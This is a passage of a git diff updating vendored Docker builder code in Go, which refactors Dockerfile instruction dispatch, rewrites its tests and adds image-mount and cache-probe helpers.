-A|안녕${PWD:+${PWD}:}xx | 안녕/home:xx -A|안녕${XXX:-\$PWD:}xx | 안녕$PWD:xx -A|안녕${XXX:-\${PWD}z}xx | 안녕${PWDz}xx -A|$KOREAN | 한국어 -A|안녕$KOREAN | 안녕한국어 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go index f5997c91a6..02e1477528 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go @@ -2,7 +2,7 @@ // // It incorporates a dispatch table based on the parser.Node values (see the // parser package for more information) that are yielded from the parser itself. -// Calling NewBuilder with the BuildOpts struct can be used to customize the +// Calling newBuilder with the BuildOpts struct can be used to customize the // experience for execution purposes only. Parsing is controlled in the parser // package, and this division of responsibility should be respected. // @@ -17,228 +17,234 @@ // before and after each step, such as creating an image ID and removing temporary // containers and images. Note that ONBUILD creates a kinda-sorta "sub run" which // includes its own set of steps (usually only one of them). -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( - "fmt" + "reflect" + "runtime" + "strconv" "strings" - "github.com/docker/docker/builder/dockerfile/command" - "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/runconfig/opts" + "github.com/moby/buildkit/frontend/dockerfile/instructions" + "github.com/moby/buildkit/frontend/dockerfile/shell" + "github.com/pkg/errors" ) -// Environment variable interpolation will happen on these statements only. -var replaceEnvAllowed = map[string]bool{ - command.Env: true, - command.Label: true, - command.Add: true, - command.Copy: true, - command.Workdir: true, - command.Expose: true, - command.Volume: true, - command.User: true, - command.StopSignal: true, - command.Arg: true, -} - -// Certain commands are allowed to have their args split into more -// words after env var replacements. Meaning: -// ENV foo="123 456" -// EXPOSE $foo -// should result in the same thing as: -// EXPOSE 123 456 -// and not treat "123 456" as a single word. -// Note that: EXPOSE "$foo" and EXPOSE $foo are not the same thing. -// Quotes will cause it to still be treated as single word. -var allowWordExpansion = map[string]bool{ - command.Expose: true, -} - -var evaluateTable map[string]func(*Builder, []string, map[string]bool, string) error - -func init() { - evaluateTable = map[string]func(*Builder, []string, map[string]bool, string) error{ - command.Add: add, - command.Arg: arg, - command.Cmd: cmd, - command.Copy: dispatchCopy, // copy() is a go builtin - command.Entrypoint: entrypoint, - command.Env: env, - command.Expose: expose, - command.From: from, - command.Healthcheck: healthcheck, - command.Label: label, - command.Maintainer: maintainer, - command.Onbuild: onbuild, - command.Run: run, - command.Shell: shell, - command.StopSignal: stopSignal, - command.User: user, - command.Volume: volume, - command.Workdir: workdir, - } -} - -// This method is the entrypoint to all statement handling routines. -// -// Almost all nodes will have this structure: -// Child[Node, Node, Node] where Child is from parser.Node.Children and each -// node comes from parser.Node.Next. This forms a "line" with a statement and -// arguments and we process them in this normalized form by hitting -// evaluateTable with the leaf nodes of the command and the Builder object. -// -// ONBUILD is a special case; in this case the parser will emit: -// Child[Node, Child[Node, Node...]] where the first node is the literal -// "onbuild" and the child entrypoint is the command of the ONBUILD statement, -// such as `RUN` in ONBUILD RUN foo. There is special case logic in here to -// deal with that, at least until it becomes more of a general concern with new -// features. -func (b *Builder) dispatch(stepN int, stepTotal int, ast *parser.Node) error { - cmd := ast.Value - upperCasedCmd := strings.ToUpper(cmd) - - // To ensure the user is given a decent error message if the platform - // on which the daemon is running does not support a builder command. - if err := platformSupports(strings.ToLower(cmd)); err != nil { - return err - } - - attrs := ast.Attributes - original := ast.Original - flags := ast.Flags - strList := []string{} - msg := fmt.Sprintf("Step %d/%d : %s", stepN+1, stepTotal, upperCasedCmd) - - if len(ast.Flags) > 0 { - msg += " " + strings.Join(ast.Flags, " ") - } - - if cmd == "onbuild" { - if ast.Next == nil { - return fmt.Errorf("ONBUILD requires at least one argument") +func dispatch(d dispatchRequest, cmd instructions.Command) (err error) { + if c, ok := cmd.(instructions.PlatformSpecific); ok { + err := c.CheckPlatform(d.state.operatingSystem) + if err != nil { + return errdefs.InvalidParameter(err) } - ast = ast.Next.Children[0] - strList = append(strList, ast.Value) - msg += " " + ast.Value - - if len(ast.Flags) > 0 { - msg += " " + strings.Join(ast.Flags, " ") + } + runConfigEnv := d.state.runConfig.Env + envs := append(runConfigEnv, d.state.buildArgs.FilterAllowed(runConfigEnv)...) + + if ex, ok := cmd.(instructions.SupportsSingleWordExpansion); ok { + err := ex.Expand(func(word string) (string, error) { + return d.shlex.ProcessWord(word, envs) + }) + if err != nil { + return errdefs.InvalidParameter(err) } - } - // count the number of nodes that we are going to traverse first - // so we can pre-create the argument and message array. This speeds up the - // allocation of those list a lot when they have a lot of arguments - cursor := ast - var n int - for cursor.Next != nil { - cursor = cursor.Next - n++ - } - msgList := make([]string, n) - - var i int - // Append the build-time args to config-environment. - // This allows builder config to override the variables, making the behavior similar to - // a shell script i.e. `ENV foo bar` overrides value of `foo` passed in build - // context. But `ENV foo $foo` will use the value from build context if one - // isn't already been defined by a previous ENV primitive. - // Note, we get this behavior because we know that ProcessWord() will - // stop on the first occurrence of a variable name and not notice - // a subsequent one. So, putting the buildArgs list after the Config.Env - // list, in 'envs', is safe. - envs := b.runConfig.Env - for key, val := range b.options.BuildArgs { - if !b.isBuildArgAllowed(key) { - // skip build-args that are not in allowed list, meaning they have - // not been defined by an "ARG" Dockerfile command yet. - // This is an error condition but only if there is no "ARG" in the entire - // Dockerfile, so we'll generate any necessary errors after we parsed - // the entire file (see 'leftoverArgs' processing in evaluator.go ) - continue + defer func() { + if d.builder.options.ForceRemove { + d.builder.containerManager.RemoveAll(d.builder.Stdout) + return } - envs = append(envs, fmt.Sprintf("%s=%s", key, *val)) - } - for ast.Next != nil { - ast = ast.Next - var str string - str = ast.Value - if replaceEnvAllowed[cmd] { - var err error - var words []string - - if allowWordExpansion[cmd] { - words, err = ProcessWords(str, envs, b.directive.EscapeToken) - if err != nil { - return err - } - strList = append(strList, words...) - } else { - str, err = ProcessWord(str, envs, b.directive.EscapeToken) - if err != nil { - return err - } - strList = append(strList, str) - } - } else { - strList = append(strList, str) + if d.builder.options.Remove && err == nil { + d.builder.containerManager.RemoveAll(d.builder.Stdout) + return } - msgList[i] = ast.Value - i++ + }() + switch c := cmd.(type) { + case *instructions.EnvCommand: + return dispatchEnv(d, c) + case *instructions.MaintainerCommand: + return dispatchMaintainer(d, c) + case *instructions.LabelCommand: + return dispatchLabel(d, c) + case *instructions.AddCommand: + return dispatchAdd(d, c) + case *instructions.CopyCommand: + return dispatchCopy(d, c) + case *instructions.OnbuildCommand: + return dispatchOnbuild(d, c) + case *instructions.WorkdirCommand: + return dispatchWorkdir(d, c) + case *instructions.RunCommand: + return dispatchRun(d, c) + case *instructions.CmdCommand: + return dispatchCmd(d, c) + case *instructions.HealthCheckCommand: + return dispatchHealthcheck(d, c) + case *instructions.EntrypointCommand: + return dispatchEntrypoint(d, c) + case *instructions.ExposeCommand: + return dispatchExpose(d, c, envs) + case *instructions.UserCommand: + return dispatchUser(d, c) + case *instructions.VolumeCommand: + return dispatchVolume(d, c) + case *instructions.StopSignalCommand: + return dispatchStopSignal(d, c) + case *instructions.ArgCommand: + return dispatchArg(d, c) + case *instructions.ShellCommand: + return dispatchShell(d, c) } + return errors.Errorf("unsupported command type: %v", reflect.TypeOf(cmd)) +} - msg += " " + strings.Join(msgList, " ") - fmt.Fprintln(b.Stdout, msg) +// dispatchState is a data object which is modified by dispatchers +type dispatchState struct { + runConfig *container.Config + maintainer string + cmdSet bool + imageID string + baseImage builder.Image + stageName string + buildArgs *BuildArgs + operatingSystem string +} - // XXX yes, we skip any cmds that are not valid; the parser should have - // picked these out already. - if f, ok := evaluateTable[cmd]; ok { - b.flags = NewBFlags() - b.flags.Args = flags - return f(b, strList, attrs, original) +func newDispatchState(baseArgs *BuildArgs) *dispatchState { + args := baseArgs.Clone() + args.ResetAllowed() + return &dispatchState{runConfig: &container.Config{}, buildArgs: args} +} + +type stagesBuildResults struct { + flat []*container.Config + indexed map[string]*container.Config +} + +func newStagesBuildResults() *stagesBuildResults { + return &stagesBuildResults{ + indexed: make(map[string]*container.Config), } +} - return fmt.Errorf("Unknown instruction: %s", upperCasedCmd) +func (r *stagesBuildResults) getByName(name string) (*container.Config, bool) { + c, ok := r.indexed[strings.ToLower(name)] + return c, ok } -// checkDispatch does a simple check for syntax errors of the Dockerfile. -// Because some of the instructions can only be validated through runtime, -// arg, env, etc., this syntax check will not be complete and could not replace -// the runtime check. Instead, this function is only a helper that allows -// user to find out the obvious error in Dockerfile earlier on. -// onbuild bool: indicate if instruction XXX is part of `ONBUILD XXX` trigger -func (b *Builder) checkDispatch(ast *parser.Node, onbuild bool) error { - cmd := ast.Value - upperCasedCmd := strings.ToUpper(cmd) +func (r *stagesBuildResults) validateIndex(i int) error { + if i == len(r.flat) { + return errors.New("refers to current build stage") + } + if i < 0 || i > len(r.flat) { + return errors.New("index out of bounds") + } + return nil +} - // To ensure the user is given a decent error message if the platform - // on which the daemon is running does not support a builder command. - if err := platformSupports(strings.ToLower(cmd)); err != nil { - return err +func (r *stagesBuildResults) get(nameOrIndex string) (*container.Config, error) { + if c, ok := r.getByName(nameOrIndex); ok { + return c, nil } + ix, err := strconv.ParseInt(nameOrIndex, 10, 0) + if err != nil { + return nil, nil + } + if err := r.validateIndex(int(ix)); err != nil { + return nil, err + } + return r.flat[ix], nil +} - // The instruction itself is ONBUILD, we will make sure it follows with at - // least one argument - if upperCasedCmd == "ONBUILD" { - if ast.Next == nil { - return fmt.Errorf("ONBUILD requires at least one argument") +func (r *stagesBuildResults) checkStageNameAvailable(name string) error { + if name != "" { + if _, ok := r.getByName(name); ok { + return errors.Errorf("%s stage name already used", name) } } + return nil +} - // The instruction is part of ONBUILD trigger (not the instruction itself) - if onbuild { - switch upperCasedCmd { - case "ONBUILD": - return fmt.Errorf("Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed") - case "MAINTAINER", "FROM": - return fmt.Errorf("%s isn't allowed as an ONBUILD trigger", upperCasedCmd) +func (r *stagesBuildResults) commitStage(name string, config *container.Config) error { + if name != "" { + if _, ok := r.getByName(name); ok { + return errors.Errorf("%s stage name already used", name) } + r.indexed[strings.ToLower(name)] = config } + r.flat = append(r.flat, config) + return nil +} + +func commitStage(state *dispatchState, stages *stagesBuildResults) error { + return stages.commitStage(state.stageName, state.runConfig) +} + +type dispatchRequest struct { + state *dispatchState + shlex *shell.Lex + builder *Builder + source builder.Source + stages *stagesBuildResults +} + +func newDispatchRequest(builder *Builder, escapeToken rune, source builder.Source, buildArgs *BuildArgs, stages *stagesBuildResults) dispatchRequest { + return dispatchRequest{ + state: newDispatchState(buildArgs), + shlex: shell.NewLex(escapeToken), + builder: builder, + source: source, + stages: stages, + } +} + +func (s *dispatchState) updateRunConfig() { + s.runConfig.Image = s.imageID +} + +// hasFromImage returns true if the builder has processed a `FROM ` line +func (s *dispatchState) hasFromImage() bool { + return s.imageID != "" || (s.baseImage != nil && s.baseImage.ImageID() == "") +} - if _, ok := evaluateTable[cmd]; ok { - return nil +func (s *dispatchState) beginStage(stageName string, image builder.Image) error { + s.stageName = stageName + s.imageID = image.ImageID() + s.operatingSystem = image.OperatingSystem() + if s.operatingSystem == "" { // In case it isn't set + s.operatingSystem = runtime.GOOS + } + if !system.IsOSSupported(s.operatingSystem) { + return system.ErrNotSupportedOperatingSystem } - return fmt.Errorf("Unknown instruction: %s", upperCasedCmd) + if image.RunConfig() != nil { + // copy avoids referencing the same instance when 2 stages have the same base + s.runConfig = copyRunConfig(image.RunConfig()) + } else { + s.runConfig = &container.Config{} + } + s.baseImage = image + s.setDefaultPath() + s.runConfig.OpenStdin = false + s.runConfig.StdinOnce = false + return nil +} + +// Add the default PATH to runConfig.ENV if one exists for the operating system and there +// is no PATH set. Note that Windows containers on Windows won't have one as it's set by HCS +func (s *dispatchState) setDefaultPath() { + defaultPath := system.DefaultPathEnv(s.operatingSystem) + if defaultPath == "" { + return + } + envMap := opts.ConvertKVStringsToMap(s.runConfig.Env) + if _, ok := envMap["PATH"]; !ok { + s.runConfig.Env = append(s.runConfig.Env, "PATH="+defaultPath) + } } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go index 4340a2f8ac..fb79b238e8 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_test.go @@ -1,21 +1,22 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( - "io/ioutil" - "strings" + "os" "testing" - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/builder" - "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/builder/remotecontext" "github.com/docker/docker/pkg/archive" "github.com/docker/docker/pkg/reexec" + "github.com/moby/buildkit/frontend/dockerfile/instructions" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" ) type dispatchTestCase struct { - name, dockerfile, expectedError string - files map[string]string + name, expectedError string + cmd instructions.Command + files map[string]string } func init() { @@ -23,107 +24,72 @@ func init() { } func initDispatchTestCases() []dispatchTestCase { - dispatchTestCases := []dispatchTestCase{{ - name: "copyEmptyWhitespace", - dockerfile: `COPY - quux \ - bar`, - expectedError: "COPY requires at least two arguments", - }, - { - name: "ONBUILD forbidden FROM", - dockerfile: "ONBUILD FROM scratch", - expectedError: "FROM isn't allowed as an ONBUILD trigger", - files: nil, - }, - { - name: "ONBUILD forbidden MAINTAINER", - dockerfile: "ONBUILD MAINTAINER docker.io", - expectedError: "MAINTAINER isn't allowed as an ONBUILD trigger", - files: nil, - }, - { - name: "ARG two arguments", - dockerfile: "ARG foo bar", - expectedError: "ARG requires exactly one argument", - files: nil, - }, - { - name: "MAINTAINER unknown flag", - dockerfile: "MAINTAINER --boo joe@example.com", - expectedError: "Unknown flag: boo", - files: nil, - }, - { - name: "ADD multiple files to file", - dockerfile: "ADD file1.txt file2.txt test", - expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", - files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, - }, - { - name: "JSON ADD multiple files to file", - dockerfile: `ADD ["file1.txt", "file2.txt", "test"]`, - expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", - files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, - }, - { - name: "Wildcard ADD multiple files to file", - dockerfile: "ADD file*.txt test", + dispatchTestCases := []dispatchTestCase{ + { + name: "ADD multiple files to file", + cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{ + "file1.txt", + "file2.txt", + "test", + }}, expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, }, { - name: "Wildcard JSON ADD multiple files to file", - dockerfile: `ADD ["file*.txt", "test"]`, + name: "Wildcard ADD multiple files to file", + cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{ + "file*.txt", + "test", + }}, expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, }, { - name: "COPY multiple files to file", - dockerfile: "COPY file1.txt file2.txt test", + name: "COPY multiple files to file", + cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{ + "file1.txt", + "file2.txt", + "test", + }}, expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, }, { - name: "JSON COPY multiple files to file", - dockerfile: `COPY ["file1.txt", "file2.txt", "test"]`, - expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", - files: map[string]string{"file1.txt": "test1", "file2.txt": "test2"}, - }, - { - name: "ADD multiple files to file with whitespace", - dockerfile: `ADD [ "test file1.txt", "test file2.txt", "test" ]`, + name: "ADD multiple files to file with whitespace", + cmd: &instructions.AddCommand{SourcesAndDest: instructions.SourcesAndDest{ + "test file1.txt", + "test file2.txt", + "test", + }}, expectedError: "When using ADD with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"}, }, { - name: "COPY multiple files to file with whitespace", - dockerfile: `COPY [ "test file1.txt", "test file2.txt", "test" ]`, + name: "COPY multiple files to file with whitespace", + cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{ + "test file1.txt", + "test file2.txt", + "test", + }}, expectedError: "When using COPY with more than one source file, the destination must be a directory and end with a /", files: map[string]string{"test file1.txt": "test1", "test file2.txt": "test2"}, }, { - name: "COPY wildcard no files", - dockerfile: `COPY file*.txt /tmp/`, - expectedError: "No source files were specified", + name: "COPY wildcard no files", + cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{ + "file*.txt", + "/tmp/", + }}, + expectedError: "COPY failed: no source files were specified", files: nil, }, { - name: "COPY url", - dockerfile: `COPY https://index.docker.io/robots.txt /`, - expectedError: "Source can't be a URL for COPY", - files: nil, - }, - { - name: "Chaining ONBUILD", - dockerfile: `ONBUILD ONBUILD RUN touch foobar`, - expectedError: "Chaining ONBUILD via `ONBUILD ONBUILD` isn't allowed", - files: nil, - }, - { - name: "Invalid instruction", - dockerfile: `foo bar`, - expectedError: "Unknown instruction: FOO", + name: "COPY url", + cmd: &instructions.CopyCommand{SourcesAndDest: instructions.SourcesAndDest{ + "https://index.docker.io/robots.txt", + "/", + }}, + expectedError: "source can't be a URL for COPY", files: nil, }} @@ -131,6 +97,7 @@ func initDispatchTestCases() []dispatchTestCase { } func TestDispatch(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") testCases := initDispatchTestCases() for _, testCase := range testCases { @@ -158,7 +125,7 @@ func executeTestCase(t *testing.T, testCase dispatchTestCase) { } }() - context, err := builder.MakeTarSumContext(tarStream) + context, err := remotecontext.FromArchive(tarStream) if err != nil { t.Fatalf("Error when creating tar context: %s", err) @@ -170,28 +137,8 @@ func executeTestCase(t *testing.T, testCase dispatchTestCase) { } }() - r := strings.NewReader(testCase.dockerfile) - d := parser.Directive{} - parser.SetEscapeToken(parser.DefaultEscapeToken, &d) - n, err := parser.Parse(r, &d) - - if err != nil { - t.Fatalf("Error when parsing Dockerfile: %s", err) - } - - config := &container.Config{} - options := &types.ImageBuildOptions{} - - b := &Builder{runConfig: config, options: options, Stdout: ioutil.Discard, context: context} - - err = b.dispatch(0, len(n.Children), n.Children[0]) - - if err == nil { - t.Fatalf("No error when executing test %s", testCase.name) - } - - if !strings.Contains(err.Error(), testCase.expectedError) { - t.Fatalf("Wrong error message. Should be \"%s\". Got \"%s\"", testCase.expectedError, err.Error()) - } - + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', context, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + err = dispatch(sb, testCase.cmd) + assert.Check(t, is.ErrorContains(err, testCase.expectedError)) } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go deleted file mode 100644 index 28fd5b156b..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_unix.go +++ /dev/null @@ -1,9 +0,0 @@ -// +build !windows - -package dockerfile - -// platformSupports is a short-term function to give users a quality error -// message if a Dockerfile uses a command not supported on the platform. -func platformSupports(command string) error { - return nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go deleted file mode 100644 index 72483a2ec8..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator_windows.go +++ /dev/null @@ -1,13 +0,0 @@ -package dockerfile - -import "fmt" - -// platformSupports is gives users a quality error message if a Dockerfile uses -// a command not supported on the platform. -func platformSupports(command string) error { - switch command { - case "stopsignal": - return fmt.Errorf("The daemon on this platform does not support the command '%s'", command) - } - return nil -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go b/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go new file mode 100644 index 0000000000..53a4b9774b --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/imagecontext.go @@ -0,0 +1,121 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "context" + "runtime" + + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/builder" + dockerimage "github.com/docker/docker/image" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +type getAndMountFunc func(string, bool, string) (builder.Image, builder.ROLayer, error) + +// imageSources mounts images and provides a cache for mounted images. It tracks +// all images so they can be unmounted at the end of the build. +type imageSources struct { + byImageID map[string]*imageMount + mounts []*imageMount + getImage getAndMountFunc +} + +func newImageSources(ctx context.Context, options builderOptions) *imageSources { + getAndMount := func(idOrRef string, localOnly bool, osForPull string) (builder.Image, builder.ROLayer, error) { + pullOption := backend.PullOptionNoPull + if !localOnly { + if options.Options.PullParent { + pullOption = backend.PullOptionForcePull + } else { + pullOption = backend.PullOptionPreferLocal + } + } + return options.Backend.GetImageAndReleasableLayer(ctx, idOrRef, backend.GetImageAndLayerOptions{ + PullOption: pullOption, + AuthConfig: options.Options.AuthConfigs, + Output: options.ProgressWriter.Output, + OS: osForPull, + }) + } + + return &imageSources{ + byImageID: make(map[string]*imageMount), + getImage: getAndMount, + } +} + +func (m *imageSources) Get(idOrRef string, localOnly bool, osForPull string) (*imageMount, error) { + if im, ok := m.byImageID[idOrRef]; ok { + return im, nil + } + + image, layer, err := m.getImage(idOrRef, localOnly, osForPull) + if err != nil { + return nil, err + } + im := newImageMount(image, layer) + m.Add(im) + return im, nil +} + +func (m *imageSources) Unmount() (retErr error) { + for _, im := range m.mounts { + if err := im.unmount(); err != nil { + logrus.Error(err) + retErr = err + } + } + return +} + +func (m *imageSources) Add(im *imageMount) { + switch im.image { + case nil: + // set the OS for scratch images + os := runtime.GOOS + // Windows does not support scratch except for LCOW + if runtime.GOOS == "windows" { + os = "linux" + } + im.image = &dockerimage.Image{V1Image: dockerimage.V1Image{OS: os}} + default: + m.byImageID[im.image.ImageID()] = im + } + m.mounts = append(m.mounts, im) +} + +// imageMount is a reference to an image that can be used as a builder.Source +type imageMount struct { + image builder.Image + source builder.Source + layer builder.ROLayer +} + +func newImageMount(image builder.Image, layer builder.ROLayer) *imageMount { + im := &imageMount{image: image, layer: layer} + return im +} + +func (im *imageMount) unmount() error { + if im.layer == nil { + return nil + } + if err := im.layer.Release(); err != nil { + return errors.Wrapf(err, "failed to unmount previous build image %s", im.image.ImageID()) + } + im.layer = nil + return nil +} + +func (im *imageMount) Image() builder.Image { + return im.image +} + +func (im *imageMount) NewRWLayer() (builder.RWLayer, error) { + return im.layer.NewRWLayer() +} + +func (im *imageMount) ImageID() string { + return im.image.ImageID() +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go b/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go new file mode 100644 index 0000000000..6960bf8897 --- /dev/null +++ b/vendor/github.com/docker/docker/builder/dockerfile/imageprobe.go @@ -0,0 +1,63 @@ +package dockerfile // import "github.com/docker/docker/builder/dockerfile" + +import ( + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/sirupsen/logrus" +) + +// ImageProber exposes an Image cache to the Builder. It supports resetting a +// cache. +type ImageProber interface { + Reset() + Probe(parentID string, runConfig *container.Config) (string, error) +} + +type imageProber struct { + cache builder.ImageCache + reset func() builder.ImageCache + cacheBusted bool +} + +func newImageProber(cacheBuilder builder.ImageCacheBuilder, cacheFrom []string, noCache bool) ImageProber { + if noCache { + return &nopProber{} + } + + reset := func() builder.ImageCache { + return cacheBuilder.MakeImageCache(cacheFrom) + } + return &imageProber{cache: reset(), reset: reset} +} + +func (c *imageProber) Reset() { + c.cache = c.reset() + c.cacheBusted = false +} + +// Probe checks if cache match can be found for current build instruction. +// It returns the cachedID if there is a hit, and the empty string on miss +func (c *imageProber) Probe(parentID string, runConfig *container.Config) (string, error) { + if c.cacheBusted { + return "", nil + } + cacheID, err := c.cache.GetCache(parentID, runConfig) + if err != nil { + return "", err + } + if len(cacheID) == 0 { + logrus.Debugf("[BUILDER] Cache miss: %s", runConfig.Cmd) + c.cacheBusted = true + return "", nil + } + logrus.Debugf("[BUILDER] Use cached version: %s", runConfig.Cmd) + return cacheID, nil +} + +type nopProber struct{} + +func (c *nopProber) Reset() {} + +func (c *nopProber) Probe(_ string, _ *container.Config) (string, error) { + return "", nil +} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/internals.go b/vendor/github.com/docker/docker/builder/dockerfile/internals.go index 6f0a367842..88e75a2179 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/internals.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/internals.go @@ -1,4 +1,4 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" // internals for handling commands. Covers many areas and a lot of // non-contiguous functionality. Please read the comments. @@ -6,664 +6,476 @@ package dockerfile import ( "crypto/sha256" "encoding/hex" - "errors" "fmt" "io" - "io/ioutil" - "net/http" - "net/url" "os" + "path" "path/filepath" - "sort" + "runtime" "strings" - "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/backend" "github.com/docker/docker/api/types/container" - "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/builder" - "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/image" "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/httputils" - "github.com/docker/docker/pkg/ioutils" - "github.com/docker/docker/pkg/jsonmessage" - "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/pkg/streamformatter" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/containerfs" + "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/pkg/system" - "github.com/docker/docker/pkg/tarsum" - "github.com/docker/docker/pkg/urlutil" - "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) -func (b *Builder) commit(id string, autoCmd strslice.StrSlice, comment string) error { - if b.disableCommit { - return nil - } - if b.image == "" && !b.noBaseImage { - return fmt.Errorf("Please provide a source image with `from` prior to commit") - } - b.runConfig.Image = b.image - - if id == "" { - cmd := b.runConfig.Cmd - b.runConfig.Cmd = strslice.StrSlice(append(getShell(b.runConfig), "#(nop) ", comment)) - defer func(cmd strslice.StrSlice) { b.runConfig.Cmd = cmd }(cmd) - - hit, err := b.probeCache() - if err != nil { - return err - } else if hit { - return nil - } - id, err = b.create() - if err != nil { - return err - } - } - - // Note: Actually copy the struct - autoConfig := *b.runConfig - autoConfig.Cmd = autoCmd - - commitCfg := &backend.ContainerCommitConfig{ - ContainerCommitConfig: types.ContainerCommitConfig{ - Author: b.maintainer, - Pause: true, - Config: &autoConfig, - }, - } - - // Commit the container - imageID, err := b.docker.Commit(id, commitCfg) - if err != nil { - return err - } - - b.image = imageID - return nil +// Archiver defines an interface for copying files from one destination to +// another using Tar/Untar. +type Archiver interface { + TarUntar(src, dst string) error + UntarPath(src, dst string) error + CopyWithTar(src, dst string) error + CopyFileWithTar(src, dst string) error + IDMappings() *idtools.IDMappings } -type copyInfo struct { - builder.FileInfo - decompress bool +// The builder will use the following interfaces if the container fs implements +// these for optimized copies to and from the container. +type extractor interface { + ExtractArchive(src io.Reader, dst string, opts *archive.TarOptions) error } -func (b *Builder) runContextCommand(args []string, allowRemote bool, allowLocalDecompression bool, cmdName string) error { - if b.context == nil { - return fmt.Errorf("No context given. Impossible to use %s", cmdName) - } - - if len(args) < 2 { - return fmt.Errorf("Invalid %s format - at least two arguments required", cmdName) - } - - // Work in daemon-specific filepath semantics - dest := filepath.FromSlash(args[len(args)-1]) // last one is always the dest - - b.runConfig.Image = b.image - - var infos []copyInfo - - // Loop through each src file and calculate the info we need to - // do the copy (e.g. hash value if cached). Don't actually do - // the copy until we've looked at all src files - var err error - for _, orig := range args[0 : len(args)-1] { - var fi builder.FileInfo - decompress := allowLocalDecompression - if urlutil.IsURL(orig) { - if !allowRemote { - return fmt.Errorf("Source can't be a URL for %s", cmdName) - } - fi, err = b.download(orig) - if err != nil { - return err - } - defer os.RemoveAll(filepath.Dir(fi.Path())) - decompress = false - infos = append(infos, copyInfo{fi, decompress}) - continue - } - // not a URL - subInfos, err := b.calcCopyInfo(cmdName, orig, allowLocalDecompression, true) - if err != nil { - return err - } +type archiver interface { + ArchivePath(src string, opts *archive.TarOptions) (io.ReadCloser, error) +} - infos = append(infos, subInfos...) +// helper functions to get tar/untar func +func untarFunc(i interface{}) containerfs.UntarFunc { + if ea, ok := i.(extractor); ok { + return ea.ExtractArchive } + return chrootarchive.Untar +} - if len(infos) == 0 { - return fmt.Errorf("No source files were specified") +func tarFunc(i interface{}) containerfs.TarFunc { + if ap, ok := i.(archiver); ok { + return ap.ArchivePath } - if len(infos) > 1 && !strings.HasSuffix(dest, string(os.PathSeparator)) { - return fmt.Errorf("When using %s with more than one source file, the destination must be a directory and end with a /", cmdName) - } - - // For backwards compat, if there's just one info then use it as the - // cache look-up string, otherwise hash 'em all into one - var srcHash string - var origPaths string + return archive.TarWithOptions +} - if len(infos) == 1 { - fi := infos[0].FileInfo - origPaths = fi.Name() - if hfi, ok := fi.(builder.Hashed); ok { - srcHash = hfi.Hash() - } - } else { - var hashs []string - var origs []string - for _, info := range infos { - fi := info.FileInfo - origs = append(origs, 